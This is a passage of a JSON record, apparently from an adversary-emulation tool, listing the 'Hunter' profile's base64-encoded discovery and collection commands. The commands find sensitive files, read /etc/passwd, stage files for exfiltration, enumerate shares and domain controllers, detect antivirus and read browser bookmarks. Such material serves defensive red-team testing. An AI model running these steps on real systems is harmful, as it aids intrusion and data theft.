"technique_id": "T1002"
},
"output": "ls : Cannot find path 'C:\\Users\\Administrator\\staged.zip' because it does not exist.\rAt line:1 char:121\r+ ... aged.zip -Force;sleep 1; ls C:\\Users\\Administrator\\staged.zip | forea ...\r+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\r + CategoryInfo : ObjectNotFound: (C:\\Users\\Administrator\\staged.zip:String) [Get-ChildItem], ItemNotFound \r Exception\r + FullyQualifiedErrorId : PathNotFound,Microsoft.PowerShell.Commands.GetChildItemCommand\r \r"
}
]
}
},
"finish": null,
"planner": "sequential",
"adversary": {
"adversary_id": "de07f52d-9928-4071-9142-cb1d3bd851e8",
"name": "Hunter",
"description": "Discover host details and steal sensitive files",
"phases": {
"1": [
{
"id": "90c2efaa-8205-480d-8bb6-61d90dbaf81bdarwinsh",
"ability_id": "90c2efaa-8205-480d-8bb6-61d90dbaf81b",
"tactic": "collection",
"technique_name": "Data from Local System",
"technique_id": "T1005",
"name": "Find files",
"test": "ZmluZCAvVXNlcnMgLW5hbWUgJyouI3tmaWxlLnNlbnNpdGl2ZS5leHRlbnNpb259JyAtdHlwZSBmIC1ub3QgLXBhdGggJyovXC4qJyAtc2l6ZSAtNTAwayAyPi9kZXYvbnVsbCB8IGhlYWQgLTU=",
"description": "Locate files deemed sensitive",
"cleanup": [],
"executor": "sh",
"unique": "90c2efaa-8205-480d-8bb6-61d90dbaf81bdarwinsh",
"platform": "darwin",
"payload": "",
"parsers": [],
"requirements": [],
"privilege": "",
"timeout": 60,
"access": 1,
"variations": []
},
{
"id": "90c2efaa-8205-480d-8bb6-61d90dbaf81bwindowspsh",
"ability_id": "90c2efaa-8205-480d-8bb6-61d90dbaf81b",
"tactic": "collection",
"technique_name": "Data from Local System",
"technique_id": "T1005",
"name": "Find files",
"test": "R2V0LUNoaWxkSXRlbSBDOlxVc2VycyAtUmVjdXJzZSAtSW5jbHVkZSAqLiN7ZmlsZS5zZW5zaXRpdmUuZXh0ZW5zaW9ufSAtRXJyb3JBY3Rpb24gJ1NpbGVudGx5Q29udGludWUnIHwgZm9yZWFjaCB7JF8uRnVsbE5hbWV9IHwgU2VsZWN0LU9iamVjdCAtZmlyc3QgNTtleGl0IDA7",
"description": "Locate files deemed sensitive",
"cleanup": [],
"executor": "psh",
"unique": "90c2efaa-8205-480d-8bb6-61d90dbaf81bwindowspsh",
"platform": "windows",
"payload": "",
"parsers": [],
"requirements": [],
"privilege": "",
"timeout": 60,
"access": 1,
"variations": []
},
{
"id": "90c2efaa-8205-480d-8bb6-61d90dbaf81bwindowspwsh",
"ability_id": "90c2efaa-8205-480d-8bb6-61d90dbaf81b",
"tactic": "collection",
"technique_name": "Data from Local System",
"technique_id": "T1005",
"name": "Find files",
"test": "R2V0LUNoaWxkSXRlbSBDOlxVc2VycyAtUmVjdXJzZSAtSW5jbHVkZSAqLiN7ZmlsZS5zZW5zaXRpdmUuZXh0ZW5zaW9ufSAtRXJyb3JBY3Rpb24gJ1NpbGVudGx5Q29udGludWUnIHwgZm9yZWFjaCB7JF8uRnVsbE5hbWV9IHwgU2VsZWN0LU9iamVjdCAtZmlyc3QgNTtleGl0IDA7",
"description": "Locate files deemed sensitive",
"cleanup": [],
"executor": "pwsh",
"unique": "90c2efaa-8205-480d-8bb6-61d90dbaf81bwindowspwsh",
"platform": "windows",
"payload": "",
"parsers": [],
"requirements": [],
"privilege": "",
"timeout": 60,
"access": 1,
"variations": []
},
{
"id": "90c2efaa-8205-480d-8bb6-61d90dbaf81blinuxsh",
"ability_id": "90c2efaa-8205-480d-8bb6-61d90dbaf81b",
"tactic": "collection",
"technique_name": "Data from Local System",
"technique_id": "T1005",
"name": "Find files",
"test": "ZmluZCAvIC1uYW1lICcqLiN7ZmlsZS5zZW5zaXRpdmUuZXh0ZW5zaW9ufScgLXR5cGUgZiAtbm90IC1wYXRoICcqL1wuKicgLXNpemUgLTUwMGsgMj4vZGV2L251bGwgfCBoZWFkIC01",
"description": "Locate files deemed sensitive",
"cleanup": [],
"executor": "sh",
"unique": "90c2efaa-8205-480d-8bb6-61d90dbaf81blinuxsh",
"platform": "linux",
"payload": "",
"parsers": [],
"requirements": [],
"privilege": "",
"timeout": 60,
"access": 1,
"variations": []
},
{
"id": "c0da588f-79f0-4263-8998-7496b1a40596darwinsh",
"ability_id": "c0da588f-79f0-4263-8998-7496b1a40596",
"tactic": "discovery",
"technique_name": "System Owner/User Discovery",
"technique_id": "T1033",
"name": "Identify active user",
"test": "d2hvYW1p",
"description": "Find user running agent",
"cleanup": [],
"executor": "sh",
"unique": "c0da588f-79f0-4263-8998-7496b1a40596darwinsh",
"platform": "darwin",
"payload": "",
"parsers": [
{
"module": "plugins.stockpile.app.parsers.basic",
"relationships": [
{
"source": "host.user.name",
"edge": "",
"target": ""
}
]
}
],
"requirements": [],
"privilege": "",
"timeout": 60,
"access": 1,
"variations": []
},
{
"id": "c0da588f-79f0-4263-8998-7496b1a40596linuxsh",
"ability_id": "c0da588f-79f0-4263-8998-7496b1a40596",
"tactic": "discovery",
"technique_name": "System Owner/User Discovery",
"technique_id": "T1033",
"name": "Identify active user",
"test": "d2hvYW1p",
"description": "Find user running agent",
"cleanup": [],
"executor": "sh",
"unique": "c0da588f-79f0-4263-8998-7496b1a40596linuxsh",
"platform": "linux",
"payload": "",
"parsers": [
{
"module": "plugins.stockpile.app.parsers.basic",
"relationships": [
{
"source": "host.user.name",
"edge": "",
"target": ""
}
]
}
],
"requirements": [],
"privilege": "",
"timeout": 60,
"access": 1,
"variations": []
},
{
"id": "c0da588f-79f0-4263-8998-7496b1a40596windowspsh",
"ability_id": "c0da588f-79f0-4263-8998-7496b1a40596",
"tactic": "discovery",
"technique_name": "System Owner/User Discovery",
"technique_id": "T1033",
"name": "Identify active user",
"test": "JGVudjp1c2VybmFtZQ==",
"description": "Find user running agent",
"cleanup": [],
"executor": "psh",
"unique": "c0da588f-79f0-4263-8998-7496b1a40596windowspsh",
"platform": "windows",
"payload": "",
"parsers": [
{
"module": "plugins.stockpile.app.parsers.basic",
"relationships": [
{
"source": "host.user.name",
"edge": "",
"target": ""
}
]
}
],
"requirements": [],
"privilege": "",
"timeout": 60,
"access": 1,
"variations": []
},
{
"id": "c0da588f-79f0-4263-8998-7496b1a40596windowscmd",
"ability_id": "c0da588f-79f0-4263-8998-7496b1a40596",
"tactic": "discovery",
"technique_name": "System Owner/User Discovery",
"technique_id": "T1033",
"name": "Identify active user",
"test": "ZWNobyAldXNlcm5hbWUl",
"description": "Find user running agent",
"cleanup": [],
"executor": "cmd",
"unique": "c0da588f-79f0-4263-8998-7496b1a40596windowscmd",
"platform": "windows",
"payload": "",
"parsers": [
{
"module": "plugins.stockpile.app.parsers.basic",
"relationships": [
{
"source": "host.user.name",
"edge": "",
"target": ""
}
]
}
],
"requirements": [],
"privilege": "",
"timeout": 60,
"access": 1,
"variations": []
},
{
"id": "c1cd6388-3ced-48c7-a511-0434c6ba8f48darwinsh",
"ability_id": "c1cd6388-3ced-48c7-a511-0434c6ba8f48",
"tactic": "discovery",
"technique_name": "Account Discovery",
"technique_id": "T1087",
"name": "Find local users",
"test": "Y3V0IC1kOiAtZjEgL2V0Yy9wYXNzd2QgfCBncmVwIC12ICdfJyB8IGdyZXAgLXYgJyMn",
"description": "Get a list of all local users",
"cleanup": [],
"executor": "sh",
"unique": "c1cd6388-3ced-48c7-a511-0434c6ba8f48darwinsh",
"platform": "darwin",
"payload": "",
"parsers": [
{
"module": "plugins.stockpile.app.parsers.basic",
"relationships": [
{
"source": "host.user.name",
"edge": "",
"target": ""
}
]
}
],
"requirements": [],
"privilege": "",
"timeout": 60,
"access": 1,
"variations": []
},
{
"id": "c1cd6388-3ced-48c7-a511-0434c6ba8f48linuxsh",
"ability_id": "c1cd6388-3ced-48c7-a511-0434c6ba8f48",
"tactic": "discovery",
"technique_name": "Account Discovery",
"technique_id": "T1087",
"name": "Find local users",
"test": "Y3V0IC1kOiAtZjEgL2V0Yy9wYXNzd2QgfCBncmVwIC12ICdfJyB8IGdyZXAgLXYgJyMn",
"description": "Get a list of all local users",
"cleanup": [],
"executor": "sh",
"unique": "c1cd6388-3ced-48c7-a511-0434c6ba8f48linuxsh",
"platform": "linux",
"payload": "",
"parsers": [
{
"module": "plugins.stockpile.app.parsers.basic",
"relationships": [
{
"source": "host.user.name",
"edge": "",
"target": ""
}
]
}
],
"requirements": [],
"privilege": "",
"timeout": 60,
"access": 1,
"variations": []
},
{
"id": "feaced8f-f43f-452a-9500-a5219488abb8darwinsh",
"ability_id": "feaced8f-f43f-452a-9500-a5219488abb8",
"tactic": "discovery",
"technique_name": "Permission Groups Discovery",
"technique_id": "T1069",
"name": "Identify local users",
"test": "ZHNjbCAuIGxpc3QgL1VzZXJzIHwgZ3JlcCAtdiAnXyc=",
"description": "Identify all local users",
"cleanup": [],
"executor": "sh",
"unique": "feaced8f-f43f-452a-9500-a5219488abb8darwinsh",
"platform": "darwin",
"payload": "",
"parsers": [],
"requirements": [],
"privilege": "",
"timeout": 60,
"access": 1,
"variations": []
},
{
"id": "feaced8f-f43f-452a-9500-a5219488abb8windowspsh",
"ability_id": "feaced8f-f43f-452a-9500-a5219488abb8",
"tactic": "discovery",
"technique_name": "Permission Groups Discovery",
"technique_id": "T1069",
"name": "Identify local users",
"test": "R2V0LVdtaU9iamVjdCAtQ2xhc3MgV2luMzJfVXNlckFjY291bnQ=",
"description": "Identify all local users",
"cleanup": [],
"executor": "psh",
"unique": "feaced8f-f43f-452a-9500-a5219488abb8windowspsh",
"platform": "windows",
"payload": "",
"parsers": [],
"requirements": [],
"privilege": "",
"timeout": 60,
"access": 1,
"variations": []
},
{
"id": "6469befa-748a-4b9c-a96d-f191fde47d89darwinsh",
"ability_id": "6469befa-748a-4b9c-a96d-f191fde47d89",
"tactic": "collection",
"technique_name": "Data Staged",
"technique_id": "T1074",
"name": "Create staging directory",
"test": "bWtkaXIgLXAgc3RhZ2VkICYmIGVjaG8gJFBXRC9zdGFnZWQ=",
"description": "create a directory for exfil staging",
"cleanup": [
"cm0gLXJmIHN0YWdlZA=="
],
"executor": "sh",
"unique": "6469befa-748a-4b9c-a96d-f191fde47d89darwinsh",
"platform": "darwin",
"payload": "",
"parsers": [
{
"module": "plugins.stockpile.app.parsers.basic",
"relationships": [
{
"source": "host.dir.staged",
"edge": "",
"target": ""
}
]
}
],
"requirements": [],
"privilege": "",
"timeout": 60,
"access": 1,
"variations": []
},
{
"id": "6469befa-748a-4b9c-a96d-f191fde47d89linuxsh",
"ability_id": "6469befa-748a-4b9c-a96d-f191fde47d89",
"tactic": "collection",
"technique_name": "Data Staged",
"technique_id": "T1074",
"name": "Create staging directory",
"test": "bWtkaXIgLXAgc3RhZ2VkICYmIGVjaG8gJFBXRC9zdGFnZWQ=",
"description": "create a directory for exfil staging",
"cleanup": [
"cm0gLXJmIHN0YWdlZA=="
],
"executor": "sh",
"unique": "6469befa-748a-4b9c-a96d-f191fde47d89linuxsh",
"platform": "linux",
"payload": "",
"parsers": [
{
"module": "plugins.stockpile.app.parsers.basic",
"relationships": [
{
"source": "host.dir.staged",
"edge": "",
"target": ""
}
]
}
],
"requirements": [],
"privilege": "",
"timeout": 60,
"access": 1,
"variations": []
},
{
"id": "6469befa-748a-4b9c-a96d-f191fde47d89windowspsh",
"ability_id": "6469befa-748a-4b9c-a96d-f191fde47d89",
"tactic": "collection",
"technique_name": "Data Staged",
"technique_id": "T1074",
"name": "Create staging directory",
"test": "TmV3LUl0ZW0gLVBhdGggIi4iIC1OYW1lICJzdGFnZWQiIC1JdGVtVHlwZSAiZGlyZWN0b3J5IiAtRm9yY2UgfCBmb3JlYWNoIHskXy5GdWxsTmFtZX0gfCBTZWxlY3QtT2JqZWN0",
"description": "create a directory for exfil staging",
"cleanup": [
"UmVtb3ZlLUl0ZW0gLVBhdGggInN0YWdlZCIgLXJlY3Vyc2U="
],
"executor": "psh",
"unique": "6469befa-748a-4b9c-a96d-f191fde47d89windowspsh",
"platform": "windows",
"payload": "",
"parsers": [
{
"module": "plugins.stockpile.app.parsers.basic",
"relationships": [
{
"source": "host.dir.staged",
"edge": "",
"target": ""
}
]
}
],
"requirements": [],
"privilege": "",
"timeout": 60,
"access": 1,
"variations": []
},
{
"id": "6469befa-748a-4b9c-a96d-f191fde47d89windowspwsh",
"ability_id": "6469befa-748a-4b9c-a96d-f191fde47d89",
"tactic": "collection",
"technique_name": "Data Staged",
"technique_id": "T1074",
"name": "Create staging directory",
"test": "TmV3LUl0ZW0gLVBhdGggIi4iIC1OYW1lICJzdGFnZWQiIC1JdGVtVHlwZSAiZGlyZWN0b3J5IiAtRm9yY2UgfCBmb3JlYWNoIHskXy5GdWxsTmFtZX0gfCBTZWxlY3QtT2JqZWN0",
"description": "create a directory for exfil staging",
"cleanup": [
"UmVtb3ZlLUl0ZW0gLVBhdGggInN0YWdlZCIgLXJlY3Vyc2U="
],
"executor": "pwsh",
"unique": "6469befa-748a-4b9c-a96d-f191fde47d89windowspwsh",
"platform": "windows",
"payload": "",
"parsers": [
{
"module": "plugins.stockpile.app.parsers.basic",
"relationships": [
{
"source": "host.dir.staged",
"edge": "",
"target": ""
}
]
}
],
"requirements": [],
"privilege": "",
"timeout": 60,
"access": 1,
"variations": []
},
{
"id": "90c2efaa-8205-480d-8bb6-61d90dbaf81bdarwinsh",
"ability_id": "90c2efaa-8205-480d-8bb6-61d90dbaf81b",
"tactic": "collection",
"technique_name": "Data from Local System",
"technique_id": "T1005",
"name": "Find files",
"test": "ZmluZCAvVXNlcnMgLW5hbWUgJyouI3tmaWxlLnNlbnNpdGl2ZS5leHRlbnNpb259JyAtdHlwZSBmIC1ub3QgLXBhdGggJyovXC4qJyAtc2l6ZSAtNTAwayAyPi9kZXYvbnVsbCB8IGhlYWQgLTU=",
"description": "Locate files deemed sensitive",
"cleanup": [],
"executor": "sh",
"unique": "90c2efaa-8205-480d-8bb6-61d90dbaf81bdarwinsh",
"platform": "darwin",
"payload": "",
"parsers": [],
"requirements": [],
"privilege": "",
"timeout": 60,
"access": 1,
"variations": []
},
{
"id": "90c2efaa-8205-480d-8bb6-61d90dbaf81bwindowspsh",
"ability_id": "90c2efaa-8205-480d-8bb6-61d90dbaf81b",
"tactic": "collection",
"technique_name": "Data from Local System",
"technique_id": "T1005",
"name": "Find files",
"test": "R2V0LUNoaWxkSXRlbSBDOlxVc2VycyAtUmVjdXJzZSAtSW5jbHVkZSAqLiN7ZmlsZS5zZW5zaXRpdmUuZXh0ZW5zaW9ufSAtRXJyb3JBY3Rpb24gJ1NpbGVudGx5Q29udGludWUnIHwgZm9yZWFjaCB7JF8uRnVsbE5hbWV9IHwgU2VsZWN0LU9iamVjdCAtZmlyc3QgNTtleGl0IDA7",
"description": "Locate files deemed sensitive",
"cleanup": [],
"executor": "psh",
"unique": "90c2efaa-8205-480d-8bb6-61d90dbaf81bwindowspsh",
"platform": "windows",
"payload": "",
"parsers": [],
"requirements": [],
"privilege": "",
"timeout": 60,
"access": 1,
"variations": []
},
{
"id": "90c2efaa-8205-480d-8bb6-61d90dbaf81bwindowspwsh",
"ability_id": "90c2efaa-8205-480d-8bb6-61d90dbaf81b",
"tactic": "collection",
"technique_name": "Data from Local System",
"technique_id": "T1005",
"name": "Find files",
"test": "R2V0LUNoaWxkSXRlbSBDOlxVc2VycyAtUmVjdXJzZSAtSW5jbHVkZSAqLiN7ZmlsZS5zZW5zaXRpdmUuZXh0ZW5zaW9ufSAtRXJyb3JBY3Rpb24gJ1NpbGVudGx5Q29udGludWUnIHwgZm9yZWFjaCB7JF8uRnVsbE5hbWV9IHwgU2VsZWN0LU9iamVjdCAtZmlyc3QgNTtleGl0IDA7",
"description": "Locate files deemed sensitive",
"cleanup": [],
"executor": "pwsh",
"unique": "90c2efaa-8205-480d-8bb6-61d90dbaf81bwindowspwsh",
"platform": "windows",
"payload": "",
"parsers": [],
"requirements": [],
"privilege": "",
"timeout": 60,
"access": 1,
"variations": []
},
{
"id": "90c2efaa-8205-480d-8bb6-61d90dbaf81blinuxsh",
"ability_id": "90c2efaa-8205-480d-8bb6-61d90dbaf81b",
"tactic": "collection",
"technique_name": "Data from Local System",
"technique_id": "T1005",
"name": "Find files",
"test": "ZmluZCAvIC1uYW1lICcqLiN7ZmlsZS5zZW5zaXRpdmUuZXh0ZW5zaW9ufScgLXR5cGUgZiAtbm90IC1wYXRoICcqL1wuKicgLXNpemUgLTUwMGsgMj4vZGV2L251bGwgfCBoZWFkIC01",
"description": "Locate files deemed sensitive",
"cleanup": [],
"executor": "sh",
"unique": "90c2efaa-8205-480d-8bb6-61d90dbaf81blinuxsh",
"platform": "linux",
"payload": "",
"parsers": [],
"requirements": [],
"privilege": "",
"timeout": 60,
"access": 1,
"variations": []
}
],
"2": [
{
"id": "b6f545ef-f802-4537-b59d-2cb19831c8eddarwinsh",
"ability_id": "b6f545ef-f802-4537-b59d-2cb19831c8ed",
"tactic": "discovery",
"technique_name": "System Network Configuration Discovery",
"technique_id": "T1016",
"name": "Snag broadcast IP",
"test": "aWZjb25maWcgfCBncmVwIGJyb2FkY2FzdA==",
"description": "Capture the local network broadcast IP address",
"cleanup": [],
"executor": "sh",
"unique": "b6f545ef-f802-4537-b59d-2cb19831c8eddarwinsh",
"platform": "darwin",
"payload": "",
"parsers": [],
"requirements": [],
"privilege": "",
"timeout": 60,
"access": 1,
"variations": []
},
{
"id": "3b5db901-2cb8-4df7-8043-c4628a6a5d5adarwinsh",
"ability_id": "3b5db901-2cb8-4df7-8043-c4628a6a5d5a",
"tactic": "discovery",
"technique_name": "Process Discovery",
"technique_id": "T1057",
"name": "Find user processes",
"test": "cHMgYXV4IHwgZ3JlcCAje2hvc3QudXNlci5uYW1lfQ==",
"description": "Get process info for processes running as a user",
"cleanup": [],
"executor": "sh",
"unique": "3b5db901-2cb8-4df7-8043-c4628a6a5d5adarwinsh",
"platform": "darwin",
"payload": "",
"parsers": [],
"requirements": [
{
"module": "plugins.stockpile.app.requirements.paw_provenance",
"relationships": [
{
"source": "host.user.name",
"edge": "",
"target": "",
"score": 1
}
]
}
],
"privilege": "",
"timeout": 60,
"access": 1,
"variations": []
},
{
"id": "3b5db901-2cb8-4df7-8043-c4628a6a5d5alinuxsh",
"ability_id": "3b5db901-2cb8-4df7-8043-c4628a6a5d5a",
"tactic": "discovery",
"technique_name": "Process Discovery",
"technique_id": "T1057",
"name": "Find user processes",
"test": "cHMgYXV4IHwgZ3JlcCAje2hvc3QudXNlci5uYW1lfQ==",
"description": "Get process info for processes running as a user",
"cleanup": [],
"executor": "sh",
"unique": "3b5db901-2cb8-4df7-8043-c4628a6a5d5alinuxsh",
"platform": "linux",
"payload": "",
"parsers": [],
"requirements": [
{
"module": "plugins.stockpile.app.requirements.paw_provenance",
"relationships": [
{
"source": "host.user.name",
"edge": "",
"target": "",
"score": 1
}
]
}
],
"privilege": "",
"timeout": 60,
"access": 1,
"variations": []
},
{
"id": "3b5db901-2cb8-4df7-8043-c4628a6a5d5awindowspsh",
"ability_id": "3b5db901-2cb8-4df7-8043-c4628a6a5d5a",
"tactic": "discovery",
"technique_name": "Process Discovery",
"technique_id": "T1057",
"name": "Find user processes",
"test": "JG93bmVycyA9IEB7fTtnd21pIHdpbjMyX3Byb2Nlc3MgfCUgeyRvd25lcnNbJF8uaGFuZGxlXSA9ICRfLmdldG93bmVyKCkudXNlcn07JHBzID0gZ2V0LXByb2Nlc3MgfCBzZWxlY3QgcHJvY2Vzc25hbWUsSWQsQHtsPSJPd25lciI7ZT17JG93bmVyc1skXy5pZC50b3N0cmluZygpXX19O2ZvcmVhY2goJHAgaW4gJHBzKSB7ICAgIGlmKCRwLk93bmVyIC1lcSAiI3tob3N0LnVzZXIubmFtZX0iKSB7ICAgICAgICAkcDsgICAgfX0=",
"description": "Get process info for processes running as a user",
"cleanup": [],
"executor": "psh",
"unique": "3b5db901-2cb8-4df7-8043-c4628a6a5d5awindowspsh",
"platform": "windows",
"payload": "",
"parsers": [],
"requirements": [
{
"module": "plugins.stockpile.app.requirements.paw_provenance",
"relationships": [
{
"source": "host.user.name",
"edge": "",
"target": "",
"score": 1
}
]
}
],
"privilege": "",
"timeout": 60,
"access": 1,
"variations": []
},
{
"id": "530e47c6-8592-42bf-91df-c59ffbd8541bwindowspwsh",
"ability_id": "530e47c6-8592-42bf-91df-c59ffbd8541b",
"tactic": "discovery",
"technique_name": "Network Share Discovery",
"technique_id": "T1135",
"name": "View admin shares",
"test": "R2V0LVNtYlNoYXJlIHwgQ29udmVydFRvLUpzb24=",
"description": "Network Share Discovery",
"cleanup": [],
"executor": "pwsh",
"unique": "530e47c6-8592-42bf-91df-c59ffbd8541bwindowspwsh",
"platform": "windows",
"payload": "",
"parsers": [
{
"module": "plugins.stockpile.app.parsers.json",
"relationships": [
{
"source": "domain.smb.share",
"edge": "",
"target": ""
}
]
}
],
"requirements": [],
"privilege": "",
"timeout": 60,
"access": 1,
"variations": []
},
{
"id": "530e47c6-8592-42bf-91df-c59ffbd8541bwindowspsh",
"ability_id": "530e47c6-8592-42bf-91df-c59ffbd8541b",
"tactic": "discovery",
"technique_name": "Network Share Discovery",
"technique_id": "T1135",
"name": "View admin shares",
"test": "R2V0LVNtYlNoYXJlIHwgQ29udmVydFRvLUpzb24=",
"description": "Network Share Discovery",
"cleanup": [],
"executor": "psh",
"unique": "530e47c6-8592-42bf-91df-c59ffbd8541bwindowspsh",
"platform": "windows",
"payload": "",
"parsers": [
{
"module": "plugins.stockpile.app.parsers.json",
"relationships": [
{
"source": "domain.smb.share",
"edge": "",
"target": ""
}
]
}
],
"requirements": [],
"privilege": "",
"timeout": 60,
"access": 1,
"variations": []
},
{
"id": "b22b3b47-6219-4504-a2e6-ae8263e49fc3windowspsh",
"ability_id": "b22b3b47-6219-4504-a2e6-ae8263e49fc3",
"tactic": "discovery",
"technique_name": "Remote System Discovery",
"technique_id": "T1018",
"name": "Find domain controller",
"test": "bmx0ZXN0IC9kY2xpc3Q6JVVTRVJET01BSU4l",
"description": "Identify remote domain controller",
"cleanup": [],
"executor": "psh",
"unique": "b22b3b47-6219-4504-a2e6-ae8263e49fc3windowspsh",
"platform": "windows",
"payload": "",
"parsers": [],
"requirements": [],
"privilege": "",
"timeout": 60,
"access": 1,
"variations": []
},
{
"id": "2dece965-37a0-4f70-a391-0f30e3331abadarwinsh",
"ability_id": "2dece965-37a0-4f70-a391-0f30e3331aba",
"tactic": "discovery",
"technique_name": "Security Software Discovery",
"technique_id": "T1063",
"name": "Discover antivirus programs",
"test": "ZmluZCAvQXBwbGljYXRpb25zLyAtbWF4ZGVwdGggMiAtaW5hbWUgKi5hcHAgfCBncmVwIC1pbyAiW2EteiBdKlwuYXBwIiB8IGdyZXAgLUVpIC0tICJzeW1hbnRlY3xub3J0b258Yml0ZGVmZW5kZXJ8a2FwZXJza3l8ZXNldHxhdmFzdHxhdmlyYXxtYWx3YXJlYnl0ZXN8c29waG9zfCh0cmVuZCBtaWNybyki",
"description": "Identify AV",
"cleanup": [],
"executor": "sh",
"unique": "2dece965-37a0-4f70-a391-0f30e3331abadarwinsh",
"platform": "darwin",
"payload": "",
"parsers": [
{
"module": "plugins.stockpile.app.parsers.antivirus",
"relationships": [
{
"source": "host.installed.av",
"edge": "",
"target": ""
}
]
}
],
"requirements": [],
"privilege": "",
"timeout": 60,
"access": 1,
"variations": []
},
{
"id": "2dece965-37a0-4f70-a391-0f30e3331abawindowspsh",
"ability_id": "2dece965-37a0-4f70-a391-0f30e3331aba",
"tactic": "discovery",
"technique_name": "Security Software Discovery",
"technique_id": "T1063",
"name": "Discover antivirus programs",
"test": "d21pYyAvTkFNRVNQQUNFOlxccm9vdFxTZWN1cml0eUNlbnRlcjIgUEFUSCBBbnRpVmlydXNQcm9kdWN0IEdFVCAvdmFsdWU=",
"description": "Identify AV",
"cleanup": [],
"executor": "psh",
"unique": "2dece965-37a0-4f70-a391-0f30e3331abawindowspsh",
"platform": "windows",
"payload": "",
"parsers": [
{
"module": "plugins.stockpile.app.parsers.basic",
"relationships": [
{
"source": "host.installed.av",
"edge": "",
"target": ""
}
]
}
],
"requirements": [],
"privilege": "",
"timeout": 60,
"access": 1,
"variations": []
},
{
"id": "5c4dd985-89e3-4590-9b57-71fed66ff4e2windowspsh",
"ability_id": "5c4dd985-89e3-4590-9b57-71fed66ff4e2",
"tactic": "discovery",
"technique_name": "Permission Groups Discovery",
"technique_id": "T1069",
"name": "Permission Groups Discovery",
"test": "Z3ByZXN1bHQgL1I=",
"description": "Summary of permission and security groups",
"cleanup": [],
"executor": "psh",
"unique": "5c4dd985-89e3-4590-9b57-71fed66ff4e2windowspsh",
"platform": "windows",
"payload": "",
"parsers": [],
"requirements": [],
"privilege": "",
"timeout": 60,
"access": 1,
"variations": []
},
{
"id": "5c4dd985-89e3-4590-9b57-71fed66ff4e2darwinsh",
"ability_id": "5c4dd985-89e3-4590-9b57-71fed66ff4e2",
"tactic": "discovery",
"technique_name": "Permission Groups Discovery",
"technique_id": "T1069",
"name": "Permission Groups Discovery",
"test": "Z3JvdXBz",
"description": "Summary of permission and security groups",
"cleanup": [],
"executor": "sh",
"unique": "5c4dd985-89e3-4590-9b57-71fed66ff4e2darwinsh",
"platform": "darwin",
"payload": "",
"parsers": [],
"requirements": [],
"privilege": "",
"timeout": 60,
"access": 1,
"variations": []
},
{
"id": "5c4dd985-89e3-4590-9b57-71fed66ff4e2linuxsh",
"ability_id": "5c4dd985-89e3-4590-9b57-71fed66ff4e2",
"tactic": "discovery",
"technique_name": "Permission Groups Discovery",
"technique_id": "T1069",
"name": "Permission Groups Discovery",
"test": "Z3JvdXBz",
"description": "Summary of permission and security groups",
"cleanup": [],
"executor": "sh",
"unique": "5c4dd985-89e3-4590-9b57-71fed66ff4e2linuxsh",
"platform": "linux",
"payload": "",
"parsers": [],
"requirements": [],
"privilege": "",
"timeout": 60,
"access": 1,
"variations": []
},
{
"id": "8c06ebf8-bacf-486b-bd77-21ba8c5a5777windowspsh",
"ability_id": "8c06ebf8-bacf-486b-bd77-21ba8c5a5777",
"tactic": "discovery",
"technique_name": "Security Software Discovery",
"technique_id": "T1063",
"name": "Identify Firewalls",
"test": "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",
"description": "Identify Firewalls",
"cleanup": [],
"executor": "psh",
"unique": "8c06ebf8-bacf-486b-bd77-21ba8c5a5777windowspsh",
"platform": "windows",
"payload": "",
"parsers": [],
"requirements": [],
"privilege": "",
"timeout": 60,
"access": 1,
"variations": []
},
{
"id": "ce485320-41a4-42e8-a510-f5a8fe96a644linuxsh",
"ability_id": "ce485320-41a4-42e8-a510-f5a8fe96a644",
"tactic": "discovery",
"technique_name": "Remote System Discovery",
"technique_id": "T1018",
"name": "Discover Mail Server",
"test": "aG9zdCAiI3t0YXJnZXQub3JnLmRvbWFpbn0iIHwgZ3JlcCBtYWlsIHwgZ3JlcCAtb0UgJ1teIF0rJCcgfCByZXYgfCBjdXQgLWMgMi0gfCByZXY=",
"description": "Identify the organization's mail server",
"cleanup": [],
"executor": "sh",
"unique": "ce485320-41a4-42e8-a510-f5a8fe96a644linuxsh",
"platform": "linux",
"payload": "",
"parsers": [
{
"module": "plugins.stockpile.app.parsers.basic",
"relationships": [
{
"source": "target.org.emailhost",
"edge": "",
"target": ""
}
]
}
],
"requirements": [],
"privilege": "",
"timeout": 60,
"access": 1,
"variations": []
},
{
"id": "ce485320-41a4-42e8-a510-f5a8fe96a644darwinsh",
"ability_id": "ce485320-41a4-42e8-a510-f5a8fe96a644",
"tactic": "discovery",
"technique_name": "Remote System Discovery",
"technique_id": "T1018",
"name": "Discover Mail Server",
"test": "aG9zdCAiI3t0YXJnZXQub3JnLmRvbWFpbn0iIHwgZ3JlcCBtYWlsIHwgZ3JlcCAtb0UgJ1teIF0rJCcgfCByZXYgfCBjdXQgLWMgMi0gfCByZXY=",
"description": "Identify the organization's mail server",
"cleanup": [],
"executor": "sh",
"unique": "ce485320-41a4-42e8-a510-f5a8fe96a644darwinsh",
"platform": "darwin",
"payload": "",
"parsers": [
{
"module": "plugins.stockpile.app.parsers.basic",
"relationships": [
{
"source": "target.org.emailhost",
"edge": "",
"target": ""
}
]
}
],
"requirements": [],
"privilege": "",
"timeout": 60,
"access": 1,
"variations": []
},
{
"id": "ce485320-41a4-42e8-a510-f5a8fe96a644windowspsh",
"ability_id": "ce485320-41a4-42e8-a510-f5a8fe96a644",
"tactic": "discovery",
"technique_name": "Remote System Discovery",
"technique_id": "T1018",
"name": "Discover Mail Server",
"test": "KG5zbG9va3VwIC1xdWVyeXR5cGU9bXggI3t0YXJnZXQub3JnLmRvbWFpbn0uIHwgU2VsZWN0LVN0cmluZyAtcGF0dGVybiAnbWFpbCcgfCBPdXQtU3RyaW5nKS5UcmltKCk=",
"description": "Identify the organization's mail server",
"cleanup": [],
"executor": "psh",
"unique": "ce485320-41a4-42e8-a510-f5a8fe96a644windowspsh",
"platform": "windows",
"payload": "",
"parsers": [
{
"module": "plugins.stockpile.app.parsers.basic",
"relationships": [
{
"source": "target.org.emailhost",
"edge": "",
"target": ""
}
]
}
],
"requirements": [],
"privilege": "",
"timeout": 60,
"access": 1,
"variations": []
},
{
"id": "b007fc38-9eb7-4320-92b3-9a3ad3e6ec25darwinsh",
"ability_id": "b007fc38-9eb7-4320-92b3-9a3ad3e6ec25",
"tactic": "discovery",
"technique_name": "Browser Bookmark Discovery",
"technique_id": "T1217",
"name": "Get Chrome Bookmarks",
"test": "Y2F0IH4vTGlicmFyeS9BcHBsaWNhdGlvblwgU3VwcG9ydC9Hb29nbGUvQ2hyb21lL0RlZmF1bHQvQm9va21hcmtz",
"description": "Get Chrome Bookmarks",
"cleanup": [],
